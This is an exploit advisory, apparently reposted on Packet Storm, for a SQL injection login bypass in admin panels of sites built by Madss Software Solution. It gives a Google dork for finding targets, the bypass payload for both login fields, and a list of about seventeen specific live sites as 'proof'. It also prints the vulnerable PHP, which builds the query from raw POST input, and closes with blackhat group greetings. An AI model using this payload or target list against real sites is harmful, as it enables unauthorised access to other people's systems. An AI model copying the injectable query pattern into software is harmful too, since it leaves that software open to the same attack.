Sites developed by Madss Software Solution suffer from a SQL injection vulnerability that allows for login bypass.
071795ced008f1a2f8f7e0ed76fe71e5dda73f79782ffcf4c433c1e224510537#########################################
# Exploit Title : Developed by Madss Software Solution Login page Bypass Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://madsssoftwaresolution.com
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd."
#
# Date: 2014/4/13
#
###########################################
#
# Exploit : Login page bypass
#
# Location : [Target]/admin/login.php
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://www.artistmahendradubey.com/admin/login.php
#
# http://www.sardarenterprises.com/admin/login.php
#
# http://www.amritaorganic.com/admin/login.php
#
# http://www.kvmcpandhana.com/admin/login.php
#
# http://www.vikatsoft.com/admin/login.php
#
# http://www.narulamathsmagic.com/admin/login.php
#
# http://www.dayodayathirthborgaon.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.mnlawcollegekhandwa.com/admin/login.php
#
# http://www.guptashrikhandwa.com/admin/login.php
#
# http://www.apnagwalior.com/admin/login.php
#
# http://www.apnamorena.com/admin/login.php
#
# http://www.djpsbhikangaon.com/admin/login.php
#
# http://www.acmecoachingbhikangaon.com/admin/login.php
#
# http://www.sainisportsacademy.com/admin/login.php
#
# http://www.apnaburhanpur.com/admin/login.php
#
############################################
Vulnerable Code
<?php
session_start();
error_reporting(0);
include("config.php");
/*if(isset($_SESSION["session_nickname"]) && $_SESSION["session_nickname"]!="")
{
header("location:admin_home.php");
}*/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin Login</title>
<link href="css/login.css" rel="stylesheet" type="text/css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
<body>
<br />
<a href="../xlexcicalx.php" style="margin-left:850px; color:#F00">Logout completelly</a>
<div id="logincontainer">
<h1>Administrator</h1>
<div id="loginbox">
<?php
if(isset($_POST['submit']))
{
$sql=mysql_query("select * from tbl_admin where username='".$_POST['username']."' and password='".$_POST['password']."' and type='admin'") or die(mysql_error());
if(mysql_num_rows($sql)>0)
{
$_SESSION["session_nickname"]=$_POST['username'];
$_SESSION["type"]='admin';
?>
<script type="text/javascript"> window.location.href="admin_home.php";</script>
<?php
}
else
{
$mass="Invalid user name or password. ";
}
?>
<tr>
<td colspan="3" align="center"><strong style="color:#FF0000"><?php echo $mass; ?></strong></td>
</tr>
<?php
}
?>
<form method="post" />
<div class="inputcontainer">
<img src="./images/icons/icon_username.png" alt="Username" />
<label for="username">Username:</label>
<input type="text" id="username" name="username" />
</div>
<div class="inputcontainer">
<img src="./images/icons/icon_locked.png" alt="Password" />
<label for="password">Password:</label>
<input type="password" id="password" name="password" />
</div>
<input type="submit" name="submit" value="Login" class="loginsubmit" />
<p><a href="forget_password.php">Forgotten password</a></p>
</form>
</div>
</div>
</body>
</html>
###################################################
Milad Hacking
We Love Mohammad
Home Page : https://www.facebook.com/milad.hacking.5
Email: milad.hacking.blackhat[at]gmail.com
Parcham balast
############################################
Special Tnx To
My Love , Iliya Norton , Unfix Blackhat , HashoR , Unline , mahdi.safavi , h00man_empire
Bahman Spy , Far Yar , Parsix , Matthew Farrell , ALi Sec , Ali Svr , Hossein Ghayoumi Zadeh , Shahram BlackHat , Saeed Nouri Massal , Hamid Reza Ashrafnia , LinX64 , Hossein Hezami , Raminramz ,Ali Reza , Saeed.0511 , Spoofer ( best Friend ) , Dr4GOn ,Alireza666 , Amirh03in , Rezahck23 , EB051 , AbolfazlKHAAN , Hacker.Ramin , b0z0rgmehr , badguy , Nc 521 , Alireza Attacker , HAMIDx9 , GNU Linux , BlackhatGH , Angel--D3m0n , B14ckc0d3r , Milad-Bushehr , F.I.G.H.T.E.R , SHD.N3T , SaiedSoft , Cyb3r_Inj3ct0r , SolD!3r , ACC3SS , Wanted2011 , CyberHacker , Hasan Speed , iman teymouri , Ba3bak , spoof , T3rm!nat0r5 , D3s!6n37 , @_HOJ@T_@ , 4rm4n , Th€ mAnger , FaridP30 , AMoK , Azad™ , The-Smith , soheil-hidd3n , blackvirus73 ,ERroR , HASSAN20 , Majidflash , R33VES™ , Rz04 , stealer , Dr.James , m@rte2a , Mast3r 0mid , MMA Defacer , MR.Moein , Mr.PERSIA , Red line
############################################
Never Forget My Top Friends <3
############################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed